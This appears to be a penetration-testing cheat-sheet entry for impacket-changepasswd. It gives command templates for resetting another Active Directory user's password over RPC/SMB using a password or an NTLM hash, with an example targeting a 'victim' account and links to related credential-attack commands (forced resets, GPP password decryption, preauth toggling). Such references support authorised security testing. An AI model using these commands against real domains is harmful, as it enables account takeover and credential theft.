Impacket changepasswd
Change an AD user's password via RPC (requires appropriate ACL rights)
- Tool
- impacket-changepasswd
- Category
- Credential Attacks / Password Manipulation
- Platform
- linux
- Requires
- password
- Protocols
- RPC, SMB
Syntax
Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.
impacket-changepasswd '<domain>/<user>:<password>'@'<ip>' -newpass '<new_password>' -altuser '<target_user>'
Credential variants
The same attack using a different authentication material.
NTLM Hash requires NTLM hash
impacket-changepasswd -hashes ':<hash>' '<domain>/<user>'@'<ip>' -newpass '<new_password>' -altuser '<target_user>'
Examples
impacket-changepasswd 'CORP.LOCAL/user:password'@192.168.1.100 -newpass 'NewPass123!' -altuser 'victim'
Tags
Related commands
- bloodyAD add uac Toggle UserAccountControl flags on a target account. Setting DONT_REQ_PREAUTH on a user…
- BloodyAD Force Password Change Force password change using BloodyAD
- bloodyAD Set Password Reset another user's password if you have ForceChangePassword…
- Impacket Get-GPPPassword Decrypt Group Policy Preference (GPP) passwords from XML files
- Net RPC Password Change Force password change via Net RPC
- NetExec change-password Module Reset a user's password when they are flagged STATUS_PASSWORD_MUST_CHANGE — typical…
- NetExec SMB GPP AutoLogin Search Group Policy Preferences for AutoLogon credentials stored in SYSVOL
- NetExec SMB GPP Password Search SYSVOL for Group Policy Preference XML files containing encrypted passwords